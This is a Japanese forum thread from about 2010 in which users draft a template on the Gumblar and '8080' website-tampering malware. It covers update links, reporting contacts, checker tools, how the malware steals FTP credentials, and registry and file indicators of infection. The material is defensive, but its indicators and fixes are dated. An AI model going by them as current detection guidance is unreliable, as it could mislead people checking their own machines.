・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (使っていないならアンインストール)
・旧版が残ったままの場合があるのでアンインストールしてください
・Javascriptとは違うので注意してください
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic

とりあえずGumblar Checker 2のリンク先をきちんと修正してくれればいいよ。
勇み足で立てられた方は古いリンクのままであきれた。

Unleakやイージスガードでパスワードの入ったフォルダをアクセス禁止にするのではだめなの？

>>921
細かく言って申し訳ないがここは
> ■Gumblar(たぶん消滅済)
> 2009/4〜6に猛威を振るったやつ。
> GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。

Gumblar(たぶん消滅済)別名GENOウイルスではどうかな
GENOウイルスで当初は始まったのだし

>>922 の続き

【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/

【改ざんWebサイトの届出先】
メールで該当サイトに通報する時は
CCにJPCERT/CCのメアドも入れると二度手間が省けます
■ JPCERT コーディネーションセンター (JPCERT/CC)
ttps://www.jpcert.or.jp/
・Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
・インシデントの届出
ttps://form.jpcert.or.jp/
・記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
■ Google Safe Browsing: Report a Malware Page
ttp://www.google.com/safebrowsing/report_badware/

【改ざんサイトの調査など】
■ チェッカーサイト
・Gumblar Checker 2 (主に"8080系"用。作者様がソースを公開して下さいました。下記は互換サイト)
ttp://gumblar.s1.dynamitelife.net/
・Gumblar.X Checker ("Gumblar.X"用)
ttp://gumblar.s1.dynamitelife.net/gumx/
・aguse
ttp://www.aguse.net/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・Dr.Web online check
ttp://online.us.drweb.com/?url=1

■ 専ブラで右クリからの検索を有効にする方法。
設定例：JaneView

設定＞基本＞機能＞コマンド欄で
コマンド名　任意の名前
実行するコマンドに　任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。

これで専ブラから検索でチェックできるようになります。

以下がそのコマンドの一例になります。
Gumblar Checker2=http://gumblar.s1.dynamitelife.net/index.php?url=$LINK&hids=on&code=on&chk=AUTO
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK

>>926
これ見れないけど俺だけかな？
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/

【8080系ウイルスについて】
メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで動作も異なります
以前はページソースの最後あたりに<script>タグから始まる
『/*Exception*/』『/*LGPL*/』『/*CODE1*/』『/*GNU GPL*/』
などの文字列を先頭に、難読化したスクリプトが埋め込まれていましたが
最近のものは難読化されていないものや上記の文字列の
ないものが出現していますので注意が必要です
Adobe Reader 9.2およびそれ以前の脆弱性を利用しているため
9.3以降の最新版にアップデートしてください
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますので、こちらもアップデートが必要です

感染すると所有するWebサイトのFTPのアカウントとパスワードを盗み
外部からサイトを改ざんされてウイルスを配布するようになります
特にレジストリなどからFTPソフトの設定を読み取るので
万一を考えてアカウントとパスワードは保存しないほうが賢明です
あとWebブラウザのInternet Explorer 6とOperaのアカウント情報も
盗むそうなのでバージョンアップやマスターパスワードを使って暗号化など
対策を考えてください

また偽セキュリティソフトなど他のウイルスを呼び込むため非常に危険です
感染したWebサイトの運営者の方はサイトを閉鎖して
ウイルスのない安全なPCからパスワードの変更をお願いします
■ 相次ぐサイト改ざん(1) 注意が必要なのは「ガンブラー」ではなく「8080」
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2115
■ 「ガンブラー攻撃」対象ソフトをJPCERTが確認〜アカウント情報盗み外部送信
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2143
■ 「ガンブラー攻撃」対象ソフトをJPCERTが確認〜サイト管理者の注意点は？
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2144

■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1f6c515039f6cb6a45d78e22d06cf05ce&format=html
■ 8080系の感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください

セーフモードから起動して
スタートアップ
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\
に"siszyd32.exe"や"wwwpos32.exe"など見知らぬ実行ファイルがあれば感染済

またはレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済です

【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染！セーフモードでも起動できないパソコンを復旧するには？
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701

【旧Gumblar(GENO)ウイルスのまとめなど】
＊＊＊ 【注意！】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ＊＊＊
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

途中でうっかり連続投稿規制にひっかかったorz
一部変更していないものもあるが、とりあえず以上で終了

>>933
おつおつ〜
遠慮していたけどもっと間にレス入れたらよかったスマン

>>929
Googleのキャッシュで見つけたが
メンテナンス中らしい

■JVN iPedia、MyJVN システムメンテナンスのお知らせ
下記の期間、システムメンテナンスのため、サービスがご利用頂けません。
ご不便をおかけいたしますが、ご理解いただきますようお願い申し上げます。

2010年02月05日(金)　18:30　〜　2010年02月08日(月)　12:00

>>935
メンテナンスの件は入れなくても大丈夫な期間だね
もし期間中ならレスですむし

>>912
でじろくにつーほーしますた。

Gumblar.X Checkerのjaneでのリンク先お願いします

>>921

> ■Gumblar.x
> 2009/10〜12に出現。
> 挿入するコードがGumblarのそれと同じだった為、
> Gumblarの進化型(亜種？)と言われていた。
> Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
> ※残骸が残っているサイトがあるが、現在は基本的に無害。

>>852で復活が報告されている

次のテンプレにはこれが入ると思ってたけど、案に入ってなかったのは意外だった
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html

>>939,940
>>921 修正
こんなところでどうだ？
本格始動するようなら仮称でカテゴリ分けるということで

【Gumblar】混ぜるな危険【8080系】

■Gumblar(いわゆるGENOウイルス。たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。

■Gumblar.x
> 2009/10〜12に出現。
> 挿入するコードがGumblarのそれと同じだった為、
> Gumblarの進化型(亜種？)と言われていた。
> Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
> ※残骸が残っているサイトがあるが、現在は基本的に無害。
だったが2010/2/5あたりからGumblar.xと同系らしき改ざんが
出現している模様で、これから注意が必要。名前は募集中。

■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG)
Gumblar.xが消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険です。

8080系は、Gumblar用の対策方法には載ってない
「Java(JRE)」の脆弱性を突いているので、Gumblarと8080系を混同して
Gumblar用の対策を施し、「これで大丈夫(ｷﾘｯ」とか言ってると、
踏んだ地雷が爆発→→→　＼(＾o＾)／オワタ　なんて事に(なるかも？)

【参考】
■ 「ガンブラー」「サイト改ざん」めぐる基本のＱ＆Ａ　〜　何が起きている？ 対策は？
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html

ガンブラだろうが8080だろうが
やってる仕組みは大して変わらんから
同じスレでやってんだろ
ガン部ラーの亜種で間違ってんのカ
スクリプトの書き方が違う！！とか

「Java(JRE)」の脆弱性を突いている！！
とかも
どんなソフトも一通り最新にしとくのが重要ってだけ
それはずっといっしょ
8080のの対策を施し、「これで大丈夫(ｷﾘｯ」とか言ってると、…

テンプレ？
長すぎるしくだらない煽りついてるし

修正希望なら、具体的に指摘しましょう。

>>941
Gumblar.xの項目の
>名前は募集中。

この部分は必要ない気がする。余計に混乱しそう
もしベンダーなりが名付けたらまたその時に考えれば良いんじゃないの？

正直、長々としたテンプレが必要なのかって気はするが…カテゴリー分けなんてSo-netなりそこらの記事のリンクだけで良いような気がする
細かくやりすぎると古くなってからの変更も大変
そもそもこのスレは改竄ウイルス総合スレであってGumblarのみを扱うスレじゃないし…そのためにGENOスレから派生した訳で

>>920
>>922
>>926
だけでよい
混ぜるな危険あたりは全部要らない